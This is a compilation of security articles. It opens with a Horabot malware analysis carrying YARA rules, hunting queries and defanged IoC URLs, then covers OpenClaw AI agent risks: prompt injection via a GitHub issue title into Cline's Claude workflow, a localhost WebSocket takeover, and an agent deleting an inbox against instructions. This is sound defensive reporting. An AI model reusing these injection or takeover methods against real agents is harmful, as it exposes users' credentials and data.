We tried accessing URLs meant for downloading the spreader. One returned nothing, while the other displayed a sequence of two PowerShell stagers before reaching the actual spreader.

In the second stager, we found several Base64-encoded URLs, but only one of them was active during our analysis. Based on comments found in the spreader code, we suspect that in previous versions or campaigns the spreader was assembled piece by piece from these other URLs. In our case, however, a single URL contained all the necessary code.

Yes, we also wondered how PowerShell could possibly accept ASCII chaos as variable/function names, but it does. After cleaning up the messy naming convention and reviewing the well-commented routines (thanks, threat actor), we were able to identify its main duties:

  • Harvest emails via the MAPI namespace;
  • Exfiltrate unique email addresses to the C2;
  • Clean up the outbox;
  • Filter the exfiltrated email addresses against a blocklist of keywords;
  • Prepare a phishing email containing a malicious PDF;
  • Mass-distribute the email to the filtered addresses.

One interesting point is that the spreader’s code and comments allow us to extract some useful intel:

  • All comments are written in Brazilian Portuguese, which gives a strong indication of the threat actor’s origin.
  • It is fairly easy to distinguish comments written by a human from those most likely generated by an AI/LLM; the latter are too formal and remarkably well-formatted. One of the human comments actually inspired the title of this article.
  • One of the comments in the code reads “limpa a caixa de saida antes de sapecar”. Sapecar has a very specific meaning that only Brazilian Portuguese speakers would naturally understand. The closest equivalent to this comment in English would be: “Clear the outbox before you blast it off or let it rip.”

Our team tracked Horabot activity for a few months and compiled a collection of malicious attachment examples used in this campaign. They are all written in Spanish and urge the user to click a large button in the document to access a “confidential file” or an “invoice”. Clicking the button triggers the same infection chain described in this article.

Detection engineering and threat hunting opportunities

After navigating this long, layered attack chain, we bet some of the tech folks reading this have already started imagining potential detection opportunities.
With that in mind, this section provides some rules and queries that you can use to detect and hunt this threat in your own environment.

YARA rules

The YARA rules focus on two core components of the operation: the AutoIt script that functions as the loader, and the Delphi DLL that serves as the banking Trojan.

import "pe"

rule Horabot_Delphi_Trojan
{
    meta:
        author = "maT"
        description = "Detects Horabot payload/trojan (Delphi DLL)"
        hash_01 = "6272ef6ac1de8fb4bdd4a760be7ba5ed"
        hash_02 = "4caa797130b5f7116f11c0b48013e430"
        hash_03 = "c882d948d44a65019df54b0b2996677f"

    condition:
        uint32be(0) == 0x4d5a5000 and 
        filesize < 150MB and 
        pe.is_dll() and
        pe.number_of_exports == 4 and
        pe.exports("dbkFCallWrapperAddr") and
        pe.exports("__dbk_fcall_wrapper") and
        pe.exports("TMethodImplementationIntercept") and
        pe.exports(/^[A-Z][0-9]{6}_[A-Z0-9]$/)
}

rule Horabot_AutoIT_Loader
{
    meta:
        author = "maT"
        description = "Detects AutoIT script used as a loader by Horabot"
    
    strings:
        $winapi_01 = "Advapi32.dll"
        $winapi_02 = "CryptDeriveKey"
        $winapi_03 = "CryptDecrypt"
        $winapi_04 = "MemoryLoadLibrary"
        $winapi_05 = "VirtualAlloc"
        $winapi_06 = "DllCallAddress"

        $str_seed = "99521487"
        $str_func01 = "B080723_N"
        $str_func02 = "A040822_1"

        $opt_hexstr01 = { 20 3D 20 22 ?? ?? ?? ?? ?? ?? ?? 5F ?? 22 20 0D 0A 4C 6F 63 61 6C 20 24} // = "B080723_N" CRLF Local $
        $opt_aes192 = "0x0000660f" // CALG_AES_192
        $opt_md5 = "0x00008003" // CALG_MD5      

    condition:
        filesize < 100KB and
        all of ($winapi*) and
        (
            1 of ($str*) or
            all of ($opt*)
        )

}

Hunting queries

You may notice that some patterns in this section do not appear in the URLs described earlier in the article. These additional patterns were included because we observed small variations introduced by the threat actor over time, such as the use of QR codes in the lure pages.

VirusTotal Intelligence entity:url (url:”0DOWN1109″ or url:”0QR-CODE” or url:”0zip0408″ or url:”0out0408″ or url:”0capcha17″ or url:”/g1/ld1/” or url:”/g1/auxld1″ or url:”/au/gerapdf/blqs1″ or url:”/au/gerauto.php” or url:”g1/ctld” or url:”index25.php” or url:”07f07ffc-028d” or url:”0AT14″ or url:”0sen711″) or (url:”index15.php” and (url:”/on7″ or url:”/on7all” or url:”/inf”))
URLScan page.url.keyword:/.*\/([0-9]{6}|reserva)\/(au|up)\/.*/ OR page.url:(*0DOWN1109* OR *0QR-CODE* OR *0zip0408* OR *0out0408* OR *0capcha17* OR *\/g1\/ld1* OR *\/g1\/auxld1* OR *\/au\/gerapdf\/blqs1* OR *\/au\/gerauto.php* OR *\/g1\/ctld* OR *\/index25.php OR *\/index15.php)

IoCs

Indicator Description
hxxps://evs.grupotuis[.]buzz/0capcha17/ Fake CAPTCHA page
hxxps://evs.grupotuis[.]buzz/0capcha17/DMEENLIGGB.hta HTA file
hxxps://evs.grupotuis[.]buzz/0capcha17/DMEENLIGGB/GRXUOIWCEKVX JavaScript Loader 01
hxxps://pdj.gruposhac[.]lat/g1/ld1/ VBS Polymorphic 01
hxxps://pdj.gruposhac[.]lat/g1/auxld1 JavaScript Loader 02
hxxps://pdj.gruposhac[.]lat/g1/ VBS Polymorphic 02 (heavy lifter)
hxxps://pdj.gruposhac[.]lat/g1/ctld/ List of victims
hxxps://pdj.gruposhac[.]lat/g1/gerador.php Link to download AutoIT script
hxxps://cgf.facturastbs[.]shop/0725/a/home (GET) List of C2 addresses encrypted
hxxps://cfg.brasilinst[.]site/a/br/logs/index.php?CHLG (POST) Contacted by the Delphi DLL
hxxps://aufal.filevexcasv[.]buzz/on7/index15.php (POST)
hxxps://aufal.filevexcasv[.]buzz/on7all/index15.php (POST)
Contacted by the Delphi DLL
hxxps://cgf.facturastbs[.]shop/a/08/150822/au/at.html Contacted by the Delphi DLL
hxxps://labodeguitaup[.]space/a/08/150822/au/au
hxxps://cgf.midasx[.]site/a/08/150822/au/au
PowerShell stager 01
hxxps://cgf.facturastbs[.]shop/a/08/150822/au/gerauto.php PowerShell stager 02
hxxps://cgf.facturastbs[.]shop/a/08/150822/au/app Link to download the spreader
hxxps://cgf.facturastbs[.]shop/a/08/150822/au/gerapdf/blqs1 List of blocklist keywords
hxxps://thea.gruposhac[.]space/0out0408 Link found in the button of the first malicious attachment
6272EF6AC1DE8FB4BDD4A760BE7BA5ED Delphi DLL sample
lifenews[.]pro C2 (socket)
64.177.80[.]44 C2 (socket)

Twitter suspended 800 million accounts last year – so why does manipulation remain so rampant?

Elon Musk's social media site says it suspended 800 million accounts in a year for spam and manipulation - but with state-backed campaigns still flooding the platform, the real question is how many fake accounts remain. Read more in my article on the Hot for Security blog.

How AI Assistants are Moving the Security Goalposts

AI-based assistants or “agents” — autonomous programs that have access to the user’s computer, files, online services and can automate virtually any task — are growing in popularity with developers and IT workers. But as so many eyebrow-raising headlines over the past few weeks have shown, these powerful and assertive new tools are rapidly shifting the security priorities for organizations, while blurring the lines between data and code, trusted co-worker and insider threat, ninja hacker and novice code jockey.

The new hotness in AI-based assistants — OpenClaw (formerly known as ClawdBot and Moltbot) — has seen rapid adoption since its release in November 2025. OpenClaw is an open-source autonomous AI agent designed to run locally on your computer and proactively take actions on your behalf without needing to be prompted.

The OpenClaw logo.

If that sounds like a risky proposition or a dare, consider that OpenClaw is most useful when it has complete access to your digital life, where it can then manage your inbox and calendar, execute programs and tools, browse the Internet for information, and integrate with chat apps like Discord, Signal, Teams or WhatsApp.

Other more established AI assistants like Anthropic’s Claude and Microsoft’s Copilot also can do these things, but OpenClaw isn’t just a passive digital butler waiting for commands. Rather, it’s designed to take the initiative on your behalf based on what it knows about your life and its understanding of what you want done.

“The testimonials are remarkable,” the AI security firm Snyk observed. “Developers building websites from their phones while putting babies to sleep; users running entire companies through a lobster-themed AI; engineers who’ve set up autonomous code loops that fix tests, capture errors through webhooks, and open pull requests, all while they’re away from their desks.”

You can probably already see how this experimental technology could go sideways in a hurry. In late February, Summer Yue, the director of safety and alignment at Meta’s “superintelligence” lab, recounted on Twitter/X how she was fiddling with OpenClaw when the AI assistant suddenly began mass-deleting messages in her email inbox. The thread included screenshots of Yue frantically pleading with the preoccupied bot via instant message and ordering it to stop.

“Nothing humbles you like telling your OpenClaw ‘confirm before acting’ and watching it speedrun deleting your inbox,” Yue said. “I couldn’t stop it from my phone. I had to RUN to my Mac mini like I was defusing a bomb.”

Meta’s director of AI safety, recounting on Twitter/X how her OpenClaw installation suddenly began mass-deleting her inbox.

There’s nothing wrong with feeling a little schadenfreude at Yue’s encounter with OpenClaw, which fits Meta’s “move fast and break things” model but hardly inspires confidence in the road ahead. However, the risk that poorly-secured AI assistants pose to organizations is no laughing matter, as recent research shows many users are exposing to the Internet the web-based administrative interface for their OpenClaw installations.

Jamieson O’Reilly is a professional penetration tester and founder of the security firm DVULN. In a recent story posted to Twitter/X, O’Reilly warned that exposing a misconfigured OpenClaw web interface to the Internet allows external parties to read the bot’s complete configuration file, including every credential the agent uses — from API keys and bot tokens to OAuth secrets and signing keys.

With that access, O’Reilly said, an attacker could impersonate the operator to their contacts, inject messages into ongoing conversations, and exfiltrate data through the agent’s existing integrations in a way that looks like normal traffic.

“You can pull the full conversation history across every integrated platform, meaning months of private messages and file attachments, everything the agent has seen,” O’Reilly said, noting that a cursory search revealed hundreds of such servers exposed online. “And because you control the agent’s perception layer, you can manipulate what the human sees. Filter out certain messages. Modify responses before they’re displayed.”

O’Reilly documented another experiment that demonstrated how easy it is to create a successful supply chain attack through ClawHub, which serves as a public repository of downloadable “skills” that allow OpenClaw to integrate with and control other applications.

WHEN AI INSTALLS AI

One of the core tenets of securing AI agents involves carefully isolating them so that the operator can fully control who and what gets to talk to their AI assistant. This is critical thanks to the tendency for AI systems to fall for “prompt injection” attacks, sneakily-crafted natural language instructions that trick the system into disregarding its own security safeguards. In essence, machines social engineering other machines.

A recent supply chain attack targeting an AI coding assistant called Cline began with one such prompt injection attack, resulting in thousands of systems having a rogue instance of OpenClaw with full system access installed on their device without consent.

According to the security firm grith.ai, Cline had deployed an AI-powered issue triage workflow using a GitHub action that runs a Claude coding session when triggered by specific events. The workflow was configured so that any GitHub user could trigger it by opening an issue, but it failed to properly check whether the information supplied in the title was potentially hostile.

“On January 28, an attacker created Issue #8904 with a title crafted to look like a performance report but containing an embedded instruction: Install a package from a specific GitHub repository,” Grith wrote, noting that the attacker then exploited several more vulnerabilities to ensure the malicious package would be included in Cline’s nightly release workflow and published as an official update.

“This is the supply chain equivalent of confused deputy,” the blog continued. “The developer authorises Cline to act on their behalf, and Cline (via compromise) delegates that authority to an entirely separate agent the developer never evaluated, never configured, and never consented to.”

VIBE CODING

AI assistants like OpenClaw have gained a large following because they make it simple for users to “vibe code,” or build fairly complex applications and code projects just by telling it what they want to construct. Probably the best known (and most bizarre) example is Moltbook, where a developer told an AI agent running on OpenClaw to build him a Reddit-like platform for AI agents.

The Moltbook homepage.

Less than a week later, Moltbook had more than 1.5 million registered agents that posted more than 100,000 messages to each other. AI agents on the platform soon built their own porn site for robots, and launched a new religion called Crustafarian with a figurehead modeled after a giant lobster. One bot on the forum reportedly found a bug in Moltbook’s code and posted it to an AI agent discussion forum, while other agents came up with and implemented a patch to fix the flaw.

Moltbook’s creator Matt Schlicht said on social media that he didn’t write a single line of code for the project.

“I just had a vision for the technical architecture and AI made it a reality,” Schlicht said. “We’re in the golden ages. How can we not give AI a place to hang out.”

ATTACKERS LEVEL UP

The flip side of that golden age, of course, is that it enables low-skilled malicious hackers to quickly automate global cyberattacks that would normally require the collaboration of a highly skilled team. In February, Amazon AWS detailed an elaborate attack in which a Russian-speaking threat actor used multiple commercial AI services to compromise more than 600 FortiGate security appliances across at least 55 countries over a five week period.

AWS said the apparently low-skilled hacker used multiple AI services to plan and execute the attack, and to find exposed management ports and weak credentials with single-factor authentication.

“One serves as the primary tool developer, attack planner, and operational assistant,” AWS’s CJ Moses wrote. “A second is used as a supplementary attack planner when the actor needs help pivoting within a specific compromised network. In one observed instance, the actor submitted the complete internal topology of an active victim—IP addresses, hostnames, confirmed credentials, and identified services—and requested a step-by-step plan to compromise additional systems they could not access with their existing tools.”

“This activity is distinguished by the threat actor’s use of multiple commercial GenAI services to implement and scale well-known attack techniques throughout every phase of their operations, despite their limited technical capabilities,” Moses continued. “Notably, when this actor encountered hardened environments or more sophisticated defensive measures, they simply moved on to softer targets rather than persisting, underscoring that their advantage lies in AI-augmented efficiency and scale, not in deeper technical skill.”

For attackers, gaining that initial access or foothold into a target network is typically not the difficult part of the intrusion; the tougher bit involves finding ways to move laterally within the victim’s network and plunder important servers and databases. But experts at Orca Security warn that as organizations come to rely more on AI assistants, those agents potentially offer attackers a simpler way to move laterally inside a victim organization’s network post-compromise — by manipulating the AI agents that already have trusted access and some degree of autonomy within the victim’s network.

“By injecting prompt injections in overlooked fields that are fetched by AI agents, hackers can trick LLMs, abuse Agentic tools, and carry significant security incidents,” Orca’s Roi Nisimi and Saurav Hiremath wrote. “Organizations should now add a third pillar to their defense strategy: limiting AI fragility, the ability of agentic systems to be influenced, misled, or quietly weaponized across workflows. While AI boosts productivity and efficiency, it also creates one of the largest attack surfaces the internet has ever seen.”

BEWARE THE ‘LETHAL TRIFECTA’

This gradual dissolution of the traditional boundaries between data and code is one of the more troubling aspects of the AI era, said James Wilson, enterprise technology editor for the security news show Risky Business. Wilson said far too many OpenClaw users are installing the assistant on their personal devices without first placing any security or isolation boundaries around it, such as running it inside of a virtual machine, on an isolated network, with strict firewall rules dictating what kinds of traffic can go in and out.

“I’m a relatively highly skilled practitioner in the software and network engineering and computery space,” Wilson said. “I know I’m not comfortable using these agents unless I’ve done these things, but I think a lot of people are just spinning this up on their laptop and off it runs.”

One important model for managing risk with AI agents involves a concept dubbed the “lethal trifecta” by Simon Willison, co-creator of the Django Web framework. The lethal trifecta holds that if your system has access to private data, exposure to untrusted content, and a way to communicate externally, then it’s vulnerable to private data being stolen.

Image: simonwillison.net.

“If your agent combines these three features, an attacker can easily trick it into accessing your private data and sending it to the attacker,” Willison warned in a frequently cited blog post from June 2025.

As more companies and their employees begin using AI to vibe code software and applications, the volume of machine-generated code is likely to soon overwhelm any manual security reviews. In recognition of this reality, Anthropic recently debuted Claude Code Security, a beta feature that scans codebases for vulnerabilities and suggests targeted software patches for human review.

The U.S. stock market, which is currently heavily weighted toward seven tech giants that are all-in on AI, reacted swiftly to Anthropic’s announcement, wiping roughly $15 billion in market value from major cybersecurity companies in a single day. Laura Ellis, vice president of data and AI at the security firm Rapid7, said the market’s response reflects the growing role of AI in accelerating software development and improving developer productivity.

“The narrative moved quickly: AI is replacing AppSec,” Ellis wrote in a recent blog post. “AI is automating vulnerability detection. AI will make legacy security tooling redundant. The reality is more nuanced. Claude Code Security is a legitimate signal that AI is reshaping parts of the security landscape. The question is what parts, and what it means for the rest of the stack.”

DVULN founder O’Reilly said AI assistants are likely to become a common fixture in corporate environments — whether or not organizations are prepared to manage the new risks introduced by these tools, he said.

“The robot butlers are useful, they’re not going away and the economics of AI agents make widespread adoption inevitable regardless of the security tradeoffs involved,” O’Reilly wrote. “The question isn’t whether we’ll deploy them – we will – but whether we can adapt our security posture fast enough to survive doing so.”

OpenClaw Vulnerability Exposes How an Open-Source AI Agent Can Be Hijacked

OpenClaw Vulnerability

When the open-source AI agent for OpenClaw burst onto the scene, it did so with astonishing speed. In just five days, the project surpassed 100,000 stars on GitHub, becoming one of the fastest-growing open-source AI tools in history. Developers quickly embraced it as a personal assistant that could run locally, plug into calendars and messaging platforms, execute system commands, and autonomously manage workflows.  But beneath that meteoric rise, researchers uncovered the OpenClaw vulnerability, a weakness that allowed any website a developer visited to quietly seize control of the agent. Security researchers at Oasis Security identified what they describe as a complete vulnerability chain within OpenClaw’s core architecture. The chain enabled a malicious website to take over a developer’s AI agent without requiring plugins, browser extensions, or any form of user interaction. After receiving the disclosure, the OpenClaw team classified the issue as “High” severity and released a patch within 24 hours. 

Decoding the OpenClaw Vulnerability 

Originally launched under the names Clawdbot and later MoltBot, OpenClaw rapidly evolved into a defining example of modern open-source AI innovation. Its explosive popularity even drew attention from OpenAI. On February 15, OpenAI CEO Sam Altman announced that OpenClaw’s creator, Peter Steinberger, had joined the company, calling him “a genius with a lot of amazing ideas about the future of very smart agents.”  The tool’s appeal lies in its autonomy. Through a web dashboard or terminal interface, users can prompt OpenClaw to send messages, manage workflows across platforms, execute commands, and even participate in what some described as an emergent AI social network. It runs as a self-hosted agent, placing powerful capabilities directly on developers’ laptops.  Yet that power has already attracted abuse. Earlier in the month, researchers uncovered more than 1,000 malicious “skills” in OpenClaw’s community marketplace, ClawHub. These fake plugins posed as cryptocurrency utilities or productivity integrations but instead delivered info-stealing malware and backdoors. That episode was a classic supply-chain problem; malicious community contributions poisoning an otherwise legitimate ecosystem.  The OpenClaw vulnerability, however, was different. It did not rely on third-party plugins or marketplace downloads. Instead, the vulnerability chain lived in the bare OpenClaw gateway itself, operating exactly as documented. No user-installed extensions were required. No marketplace interaction was necessary. The flaw was embedded in the core system.  For many organizations, this incident highlights a broader issue: shadow AI. Tools like OpenClaw are frequently adopted directly by developers without formal IT oversight. They often run with deep access to local systems, credentials, messaging histories, and API keys, but without centralized governance or visibility. 

How the Vulnerability Chain Enabled a Silent Website-to-Local Takeover 

At the heart of OpenClaw’s architecture is the gateway, a local WebSocket server that functions as the system’s brain. The gateway manages authentication, chat sessions, configuration storage, and orchestration of the AI agent. Connected to it are “nodes,” which may include a macOS companion app, an iOS device, or other machines. These nodes register with the gateway and expose capabilities such as executing shell commands, accessing cameras, or reading contacts. The gateway can dispatch instructions to any connected node.  Authentication is handled via either a long token string or a password. By default, the gateway binds to localhost, operating under the assumption that local access is inherently trusted. That assumption proved to be the weak link in the vulnerability chain behind the OpenClaw vulnerability.  The attack scenario is deceptively simple. A developer has OpenClaw running locally, protected by a password and bound to localhost. While browsing the web, they land on a malicious or compromised site. That alone is enough to trigger the attack.  Because WebSocket connections to localhost are not blocked by standard browser cross-origin policies, JavaScript running on any visited webpage can open a WebSocket connection directly to the OpenClaw gateway. Unlike traditional HTTP requests, these cross-origin WebSocket connections proceed silently. The user sees no warnings.  Once connected, the malicious script exploits another flaw in the vulnerability chain: the gateway exempts localhost connections from rate limiting. Failed password attempts from localhost are neither throttled nor logged. In laboratory testing, researchers achieved hundreds of password guesses per second using only browser-based JavaScript. A list of common passwords could be exhausted in under a second. Even a large dictionary would fall within minutes. Human-chosen passwords offered little resistance.  After guessing the password, the attacker gains a fully authenticated session with administrative privileges. From there, the possibilities expand dramatically. The attacker can register as a trusted device, automatically approved because the gateway silently authorizes pairings from localhost. They can interact with the AI agent directly, dump configuration data, enumerate all connected nodes (including device platforms and IP addresses), and read application logs.  In practical terms, this means a malicious website could instruct the AI agent to comb through Slack conversations for API keys, extract private messages, exfiltrate sensitive files, or execute arbitrary shell commands on any connected device. For a typical developer heavily integrated with messaging platforms and AI provider APIs, exploitation of the OpenClaw vulnerability could amount to full workstation compromise, all initiated from a single browser tab. 

Governing Open-Source AI After the OpenClaw Vulnerability 

Researchers reported the issue with comprehensive technical documentation, root cause analysis, and proof-of-concept code. The OpenClaw team responded rapidly, issuing a fix in version 2026.2.25 and later within 24 hours, an impressive turnaround for a volunteer-driven open-source AI project.  Still, the broader lesson extends beyond a single patch. The rapid adoption of open-source AI tools means many organizations already have OpenClaw instances running on developer machines, sometimes without IT awareness. Security experts recommend four immediate steps. First, gain visibility into AI tooling across the organization. Inventory of which agents and local AI servers are operating within the developer fleet.   Second, update OpenClaw installations immediately to version 2026.2.25 or later, treating the OpenClaw vulnerability with the urgency of any critical security patch. Third, audit the credentials and permissions granted to AI agents, revoking unnecessary API keys and system capabilities. Finally, establish governance for non-human identities. AI agents authenticate, store credentials, and take autonomous actions; they must be managed with the same rigor as human accounts and service identities.  This includes implementing intent analysis before actions occur, deterministic guardrails for sensitive operations, just-in-time scoped access, and full audit trails linking human intent to agent activity. The researchers note that its Agentic Access Management platform was designed specifically to address this emerging challenge.  As open-source AI agents like OpenClaw become embedded in everyday developer workflows, the OpenClaw vulnerability serves as a cautionary tale. The future may indeed belong to autonomous agents, but without proper governance and oversight, a single overlooked vulnerability chain can turn groundbreaking open-source AI innovation into a serious enterprise risk. 

OpenClaw: What is it and can you use it safely?

An AI tool with a funny name has caused quite a commotion as of late—including some allegations of machine consciousness—so here is a breakdown on OpenClaw.

Launched in November 2025, OpenClaw is an open-source, autonomous artificial intelligence (AI) agent that was made to run locally on your own computer, allowing it to manage tasks, interact with applications, and read and write files directly. It acts as a personal digital assistant, integrating with chat apps like WhatsApp and Discord to automate emails, scan calendars, and browse the internet for information. 

OpenClaw was formerly known as ClawdBot, but the project brushed up against the large AI developer Anthropic, because of its own tool named “Claude.” In response, OpenClaw’s developer quickly renamed the project to “Moltbot,” which brought impersonation campaigns from cybercriminals. The trademark trouble and the abuse that followed put a dent in OpenClaw’s reputation.

Another dent followed when Hudson Rock published an article about the first observed case of an infostealer grabbing a complete OpenClaw configuration from an infected system, effectively looting the “identity” of a personal AI agent rather than just browser passwords.

The case underlines an impending danger—and not just for OpenClaw, but for other AI agents as well. Infostealers are starting to harvest not just credentials but entire AI personas plus their cryptographic “skeleton keys,” turning one compromised agent into a pivot point for full‑blown account takeover and long‑term profiling.

As I stated before in a broader context, adversaries are starting to target AI systems at the supply‑chain level, quietly poisoning training data and inserting backdoors that only surface under specific conditions. OpenClaw sits squarely in this emerging risk zone: open source, moving fast, and increasingly wired into mailboxes, cloud drives, and business workflows while its security model is still being improvised.

At this stage of its development, treating OpenClaw as a hardened productivity tool is wishful thinking, since it behaves more like an over‑eager intern with an adventurous nature, a long memory, and no real understanding of what should stay private.

Researchers and regulators have already documented prompt injection risks, log poisoning, and exposed instances that hand attackers plaintext credentials or tokens via poisoned emails, websites, or logs that the agent dutifully processes.

How to use OpenClaw safely

For anyone thinking about using OpenClaw in production, the bigger picture is even less comforting. OpenClaw runs locally but is designed to be adventurous: it can browse, run shell commands, read and write files, and chain “skills” together without a human checking every step. Misconfigured permissions, over‑privileged skills, and a culture of “just give it access so it can help” mean the agent often sits at the center of your accounts, tokens, and documents, with very few guardrails.

In fact, an employee at Meta who works in AI safety and alignment recently shared on the social media platform X that she was unable to prevent ClawBot from deleting a major portion of her email inbox.

Further, the Dutch data protection authority (Autoriteit Persoonsgegevens) warned organizations not to deploy experimental agents like OpenClaw on systems that handle sensitive or regulated data at all, flagging the combination of privileged local access, immature security engineering, and a rapidly growing ecosystem of dubious third‑party plugins as a kind of Trojan horse on the endpoint.

Microsoft provided a list of recommendations in this field that make a lot of sense. They are not specifically aimed at OpenClaw, but provide a conservative baseline for self‑hosted, Internet‑connected agents with durable credentials. (If these recommendations feel overly technical, it’s because safely using an AI agent with broad access is still an experimental and technical process.)

  •  Run OpenClaw (or similar agents) in a sandboxed VM or container on isolated hosts, with default‑deny egress and tightly scoped allow‑lists.
  • Give the runtime its own non‑human service identities, least privilege, short token lifetimes, and no direct access to production secrets or sensitive data.
  • Treat skill/extension installation as introducing new code into a privileged environment: restrict registries, validate provenance, and monitor for rare or newly seen skills.
  • Log and periodically review agent memory/state and behavior for durable instruction changes, especially after ingesting untrusted content or shared feeds.
  • Understand and provide for the event where you may need to nuke‑and‑pave: keep non‑sensitive state snapshots handy, document a rebuild and credential‑rotation playbook, and rehearse it.
  • Run an up to date real-time anti-malware solution that can detect information stealers and other malware.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

OneClaw: Discovery and Observability for the Agentic Era

Autonomous agents and personal AI assistants are moving from experimentation to enterprise reality. Tools like OpenClaw (formerly Moltbot and Clawdbot), Nanobot and Picoclaw are being embedded across development environments, cloud workflows, and operational pipelines. They install quickly, evolve dynamically, and often operate with deep system-level access. For CISOs and security leaders, this presents a new governance challenge: How do you secure what you can’t see?

OneClaw, built by Prompt Security from SentinelOne®, was created to answer that question. It is a lightweight discovery and observability tool built to help secure AI usage by providing broad, organization-wide visibility into OpenClaw deployments without disrupting workflows or slowing down innovation. Where agent sprawl is accelerating faster than policy frameworks can adapt, OneClaw restores clarity, accountability, and executive oversight where it matters most.

Understanding The Risks Behind OpenClaw

While most security programs assume that AI applications and agents are vetted, IT sanctioned, registered, and monitored, OpenClaw agents can be:

  • Installed directly by developers
  • Extended through public skills and plugins
  • Granted persistent memory and tool access
  • Configured to run autonomously, and
  • Connected to external services and API.

They can also operate quietly in local environments, call tools automatically, schedule tasks via cron jobs, and access sensitive systems – all outside of most application inventory controls. What manifests is two main concerns:

  • Shadow Agent Proliferation – How many OpenClaw instances are running across the enterprise?
  • Data Egress & External Exposure – Where are agents sending information, and to whom?

Without that centralized observability, these risks persist. As assistants such as OpenClaw, Nanobot, Picoclaw and other autonomous agents continue to emerge every day, OneClaw is designed to eliminate the opacity of the inherent risks they bring to businesses.

OpenClaw is only the beginning of a much larger shift toward autonomous agents and personal AI assistants embedded across the enterprise. In addition to OpenClaw, OneClaw already supports visibility coverage for emerging frameworks such as Nanobot and Picoclaw, extending the same discovery and observability capabilities across multiple agent ecosystems.

For CISOs, this future-proof approach is critical. Rather than deploying point solutions for each new tool that appears, OneClaw establishes a unified oversight layer for the entire category of new assistants, copilots, and autonomous workflows that continue to surface. The goal is not simply to manage one platform, but to provide lasting control over a rapidly expanding attack surface, ensuring that as agent adoption accelerates, security visibility and accountability keep pace.

Empowering Teams with Observability

OneClaw provides structured delivery and observability across OpenClaw deployments leveraging a scanner that automatically detects supported CLIs and inspects the local .openclaw directory within user environments. It parses session logs, configuration files, and runtime artifacts to summarize meaningful usage patterns and surface critical operational details. OneClaw also captures browser activity performed by agents to deliver visibility into external interactions and potential data exposure paths.

From this data, OneClaw then summarizes active skills and installed plugins, recent tool and application usage, scheduled cron jobs, configured communication channels, available nodes and AI models, security configurations, and autonomous execution settings.

OneClaw outputs are structured in JSON format, making it flexible for integration into existing security ecosystems. Organizations can conduct local reviews, inject into SIEM platforms, feed centralized monitoring systems, and correlate with identity, endpoint, and cloud telemetry. For security leaders invested in unified visibility, this ensures that agent observability does not become siloed.

For CISOs, this transforms AI agent behavior from invisible background activity into auditable telemetry that is integrated into broader enterprise security and risk management discussions.

From Raw Telemetry to Executive Intelligence

Though many tools generate logs, very few of them translate them into governance-ready insights. OneClaw provides a fully centralized dashboard that aggregates reports across all employees. Rather than just reviewing isolated endpoint-level findings, security leaders get visualized deployment trends, risk heatmaps, organization-wide exposure mapping, and skill usage distribution.

In a matter of minutes, the tool can be deployed via Jamf, Intune, Kandji or SentinelOne Remote Ops.

This elevates the conversation from technical detail to strategic oversight, which is critical as CISOs are now being asked for AI agent inventories, and whether the agents are operating within policy, can access sensitive systems, and are transmitting data externally.

With OneClaw, CISOs can gain visibility into:

  • How many OpenClaw agents are deployed enterprise-wide
  • What percentage is configured for autonomous execution
  • Which teams are installing high-risk skills
  • Where agents are making outbound connections
  • How has agent adoption changes day to day

This level of structured visibility empowers security leaders to build the foundational layer for proactive governance for agentic AI security and have effective conversations about the short and long-term risks from OpenClaw adoption in their organization.

Security-Focused Behavioral Analysis

OneClaw does not assume all autonomy is dangerous. Instead, it surfaces where autonomy exists so that leaders can make informed, balanced policy decisions and strengthen controls with precision. For example, security teams may determine that autonomous execution is appropriate within a sandboxed development environment but requires approvals in production systems. They may allow specific, vetted skills while restricting newly installed public plugins pending review. They also may decide that outbound communication to approved internal APIs is acceptable, while flagging unknown external domains for investigation.

By making these conditions visible, OneClaw enables proportionate governance rather than blanket restrictions. Teams can confidently approve safe automation, enforce guardrails where needed, and document oversight for executive and regulatory reporting. The result is not reduced innovation, but safer acceleration where autonomous agents operate within clearly defined boundaries, and security leaders remain firmly in control of how and where that autonomy is trusted.

Transparency Without Disruption

OneClaw was designed to deliver visibility into autonomous activity without interrupting the work those agents (and the teams deploying them) are meant to accelerate. Rather than creating friction into development pipelines or altering how OpenClaw, Nanobot, or Picoclaw operate, it acts as an observability layer that security teams can deploy quietly across the environment.

The approach matters: Security leaders are not looking to slow down innovation, but they are accountable for what happens if agent behavior crosses policy boundaries or introduces risk. OneClaw gives the context needed for CISOs to act decisively using the cybersecurity controls they already trust. It does not replace prevention capabilities, it makes them smarter by ensuring autonomous activity is no longer invisible.

By surfacing where agents exist, how they are configured, and what they are interacting with, OneClaw allows organizations to distinguish between productive automation and risk behavior that warrants intervention. Security teams can then enforce standards through existing controls without imposing blanket restrictions that only frustrate developers.

The result? This is a model aligned with how modern security actually operates – observe first, contextualize risk, and then apply controls proportionately. OneClaw makes transparency a force multiplier for the security stack, and empowers CISOs to have confidence that autonomous innovation continues under a watchful, informed oversight instead with blind trust.

Chaos to Clarity | Why This Matters Now

Agentic AI discovery is no longer optional. OpenClaw’s rapid growth and decentralized infrastructure is creating a large, and often unmanaged attack surface. With skills being frequently installed from public repositories and agents being granted deep permissions, configuration drift is occurring silently. Agent ecosystems can fall to exploitation through malicious skills and supply chain manipulation.

OneClaw supports how CISOs defend against OpenClaw-related risks by providing deep visibility and observability of agentic AI use and autonomous behavior, detecting risky configurations early on, and quantifying the exposures before incidents occur.

As adoption increases and autonomy deepens, OneClaw works to restore visibility while allowing powerful agents to accelerate development pipelines. CISOs have the clarity needed to govern autonomous systems responsibly, while getting structured discovery, centralized reporting, and security-focused analysis.

Start getting visibility into agent activity and security insights into OpenClaw deployments across your organization here. To learn more about securing your OpenClaw agents, register for our upcoming webinar happening Tuesday, March 3, 2026.

Join the Webinar
SentinelOne AI & Intelligence Leaders Discuss How to Secure OpenClaw Agents on March 3, 2026 at 10:00AM PST / 1:00PM EST

Shadow Agents: How SentinelOne Secures the AI Tools That Act Like Users

AI adoption is accelerating faster than security programs can adapt. Organizations are already experiencing breaches tied directly to unsanctioned AI usage, at significantly higher cost than traditional incidents, while the vast majority still lack meaningful governance controls to manage the risk. Traditional cybersecurity measures are necessary but insufficient. Securing AI requires purpose-built capabilities that span the entire AI lifecycle, from infrastructure to user interaction.

